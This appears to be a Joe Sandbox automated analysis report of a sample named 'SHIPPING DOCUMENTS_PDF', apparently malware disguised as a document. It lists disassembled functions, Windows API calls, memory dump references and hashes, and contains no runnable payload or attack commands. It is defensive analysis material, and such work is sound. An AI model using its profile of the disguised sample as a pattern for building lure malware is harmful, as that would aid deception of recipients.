                                                                                    control_flow_graph 1159 b535b0-b535bb 1160 b535bd-b535c2 1159->1160 1161 b5362f-b53631 1159->1161 1160->1161 1163 b535c4-b535dc RegOpenKeyExW 1160->1163 1162 b53620-b53625 1161->1162 1163->1161 1164 b535de-b535fd RegQueryValueExW 1163->1164 1165 b53614-b5361f RegCloseKey 1164->1165 1166 b535ff-b5360a 1164->1166 1165->1162 1167 b53626-b5362d 1166->1167 1168 b5360c-b5360e 1166->1168 1169 b53612 1167->1169 1168->1169 1169->1165
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B535A1,SwapMouseButtons,00000004,?), ref: 00B535D4
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B535F5
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B53617
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: 74f63551e2a75947e93d66876ef58deea8f394429c4f82503ea6b350ddca01df
                                                                                    • Instruction ID: b59badd1e5f55a4ff5b5f03a3ae71123aa34d1db9d58d24c919c5b9ac5bb3f4d
                                                                                    • Opcode Fuzzy Hash: 74f63551e2a75947e93d66876ef58deea8f394429c4f82503ea6b350ddca01df
                                                                                    • Instruction Fuzzy Hash: 17114871519209BFDB208F64DC80ABEB7F8EF04B81F0084AAF805D7310E6719E549760
                                                                                    Function 00BB955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1170 bb955b-bb95de call b54ee5 call bb9734 1175 bb95e8-bb9656 call b54f0b * 4 call b54ee5 call b7571c 1170->1175 1176 bb95e0 1170->1176 1190 bb965b-bb969f call b7571c call b54f0b call bb9109 call bb8953 1175->1190 1177 bb95e2-bb95e3 1176->1177 1179 bb972b-bb9731 1177->1179 1199 bb96a1-bb96b1 call b72d55 * 2 1190->1199 1200 bb96b6-bb96ba 1190->1200 1199->1177 1202 bb971b-bb9721 call b72d55 1200->1202 1203 bb96bc-bb9719 call bb8b06 call b72d55 1200->1203 1212 bb9723-bb9729 1202->1212 1203->1212 1212->1179
                                                                                    APIs
                                                                                      • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                                                                    • _free.LIBCMT ref: 00BB96A2
                                                                                    • _free.LIBCMT ref: 00BB96A9
                                                                                    • _free.LIBCMT ref: 00BB9714
                                                                                      • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                                                      • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                                                                    • _free.LIBCMT ref: 00BB971C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                    • Instruction ID: 3cd9946dd38b378b7dbcecea6b77675e0c77df7cf9095d83fc755e65d5618c96
                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                    • Instruction Fuzzy Hash: 09514CB1904218AFDF259F65CC85AEEBBB9EF48304F1044EEB61DA3241DB715A81CF58
                                                                                    Function 00B7470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2782032738-0
                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                    • Instruction ID: 2af298497ab0877867d5e0a62d4f3379a925012c12cb560e94a46984c847d75b
                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                    • Instruction Fuzzy Hash: 38419375B007499BDB1C8E69C8809AE7BE5EF46362B24C5BDE83DCB640EB70DD418B41
                                                                                    Function 00B57285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B8EA39
                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00B8EA83
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                      • Part of subcall function 00B70791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X
                                                                                    • API String ID: 3777226403-3081909835
                                                                                    • Opcode ID: 8041893aa20d719217cf31e2a1087b83b88535ff46e7c2fd249c2424a72d067b
                                                                                    • Instruction ID: 5c14e49679abe86b63a17bc4072ccd4ecc3705f4abefb4c2cba13961c26246f0
                                                                                    • Opcode Fuzzy Hash: 8041893aa20d719217cf31e2a1087b83b88535ff46e7c2fd249c2424a72d067b
                                                                                    • Instruction Fuzzy Hash: 9121C371A102489BCF01AF94D845BEE7BFCAF49715F00809AE858A7281DFB4598DCFA1
                                                                                    Function 00BB98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00BB98F8
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00BB990F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: 24eb931da8f0e4fea4176a7bedb41f2939908d1011a8c1743ec626e3856a31bf
                                                                                    • Instruction ID: 09c7898c6e479bdfb8a3b66ebc70c788bf7d60bbd3339f26271c1732c5632863
                                                                                    • Opcode Fuzzy Hash: 24eb931da8f0e4fea4176a7bedb41f2939908d1011a8c1743ec626e3856a31bf
                                                                                    • Instruction Fuzzy Hash: 28D05B7554530E6BDB509B90DC0DFA6B73CD704700F0042B1BA55921D1ED7095588B95
                                                                                    Function 00BCCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 020297298014a1738744be99e8740ec0752c53daef6e328a9ac89895b27fcb6d
                                                                                    • Instruction ID: c97da53f7347dfe21de736acfb8a3b5947acb82f1c6a6c99d2620d7b096824ff
                                                                                    • Opcode Fuzzy Hash: 020297298014a1738744be99e8740ec0752c53daef6e328a9ac89895b27fcb6d
                                                                                    • Instruction Fuzzy Hash: 95F139716083059FCB14DF28C480A6ABBE5FF99314F1489AEF89A9B351D730E945CF82
                                                                                    Function 00B5F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                                                                      • Part of subcall function 00B660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B5F930), ref: 00B66154
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B5F9CD
                                                                                    • OleInitialize.OLE32(00000000), ref: 00B5FA4A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B945C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1986988660-0
                                                                                    • Opcode ID: e9746d6851ea0e081164b5dbef9103afb84feaa72be3cc83dbc3b581efcfbece
                                                                                    • Instruction ID: 58467768f47ddd3c81433d0aa3aeeb955ee91025df59434d8c80674cd4ff7166
                                                                                    • Opcode Fuzzy Hash: e9746d6851ea0e081164b5dbef9103afb84feaa72be3cc83dbc3b581efcfbece
                                                                                    • Instruction Fuzzy Hash: F781CCB0915A40CEC784DF29E8817DCBBE5FBDB306790C1AAA019CB3B1EB7044858F55
                                                                                    Function 00B5434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B54370
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B54432
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1505330794-0
                                                                                    • Opcode ID: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                                                                    • Instruction ID: 0e6775b137a8643b284c84068eed8c9e284b7777b0bd54af16b024f9d97ba828
                                                                                    • Opcode Fuzzy Hash: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                                                                    • Instruction Fuzzy Hash: 45318071505701DFC721DF24D88479BBBF8FB49309F0049AEE99A87251E7B0A988CB52
                                                                                    Function 00B7571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                                                      • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A192
                                                                                      • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A19C
                                                                                    • __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                                                      • Part of subcall function 00B7A1C8: GetModuleFileNameW.KERNEL32(00000000,00C133BA,00000104,?,00000001,00000000), ref: 00B7A25A
                                                                                      • Part of subcall function 00B7A1C8: ___crtMessageBoxW.LIBCMT ref: 00B7A308
                                                                                      • Part of subcall function 00B7309F: ___crtCorExitProcess.LIBCMT ref: 00B730A5
                                                                                      • Part of subcall function 00B7309F: ExitProcess.KERNEL32 ref: 00B730AE
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    • RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000000,?,?,?,00B70DD3,?), ref: 00B7575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1372826849-0
                                                                                    • Opcode ID: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                                                                    • Instruction ID: 052577923be417da4ba72afca69f90381bdf7b826858ae6ae5612e09afe001d2
                                                                                    • Opcode Fuzzy Hash: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                                                                    • Instruction Fuzzy Hash: 7801D231244A02DAE6292738AC82B6E63C8DB82762F1080A5F43DEB281DEB09D014660
                                                                                    Function 00BB98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BB9548,?,?,?,?,?,00000004), ref: 00BB98BB
                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BB98D1
                                                                                    • CloseHandle.KERNEL32(00000000,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB98D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    • Opcode ID: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                                                                    • Instruction ID: dddc0433c6970e43308bbddd74fe6aafe15e5d4121c257e4ab68b03d905cf05f
                                                                                    • Opcode Fuzzy Hash: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                                                                    • Instruction Fuzzy Hash: B2E08632146225B7D7211B54EC09FEABF59EF06B70F104121FB157A0E09BB11A119798
                                                                                    Function 00BB8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00BB8D1B
                                                                                      • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                                                      • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                                                                    • _free.LIBCMT ref: 00BB8D2C
                                                                                    • _free.LIBCMT ref: 00BB8D3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                    • Instruction ID: 1c6bd86f07bbaf6ca1a6bc234ad92ac0c8f186dc2d95ca0260f276e2bdc3557a
                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                    • Instruction Fuzzy Hash: 2DE012A160160157CB34A679A940AE313DC8F5835271449BEB41DD7186CEA4F842C124
                                                                                    Function 00B5A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CALL
                                                                                    • API String ID: 0-4196123274
                                                                                    • Opcode ID: 211aa78404d672a1659dc6faa981ea971145f26dcb98e69bebfec6064c522434
                                                                                    • Instruction ID: 16cade2d6ac3dafe901ab27ca086340fb43f73bf2d7880c291604f146d08d9dc
                                                                                    • Opcode Fuzzy Hash: 211aa78404d672a1659dc6faa981ea971145f26dcb98e69bebfec6064c522434
                                                                                    • Instruction Fuzzy Hash: 6B223770508201DFDB24EF14C494B6ABBE1FF89305F1589EDE89A9B261D731ED49CB82
                                                                                    Function 00B54C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: EA06
                                                                                    • API String ID: 4104443479-3962188686
                                                                                    • Opcode ID: 0a8df9ff249547208b29722edf40649ecc95e45d2f3783795e0e593131a9affb
                                                                                    • Instruction ID: 9b6e0d4b73defcbf86d46f40a85c1940afea7c508adc8db1f3ba37820e96ad39
                                                                                    • Opcode Fuzzy Hash: 0a8df9ff249547208b29722edf40649ecc95e45d2f3783795e0e593131a9affb
                                                                                    • Instruction Fuzzy Hash: ED415D21A0415867DF229B6488927BE7FF1DB4530AF2844F5EC869B2C2D7245DCD83A1
                                                                                    Function 00B57A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                    • Instruction ID: e59bef70742a6bafc45cda579e98465c2d2f3d8c6de304258f13df6451e094ba
                                                                                    • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                    • Instruction Fuzzy Hash: 3431C4B1704606AFC704DF68D8D1E69B3E9FF4831071486AAF929CB291EF30E914CB90
                                                                                    Function 00B547D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 00B54834
                                                                                      • Part of subcall function 00B7336C: __lock.LIBCMT ref: 00B73372
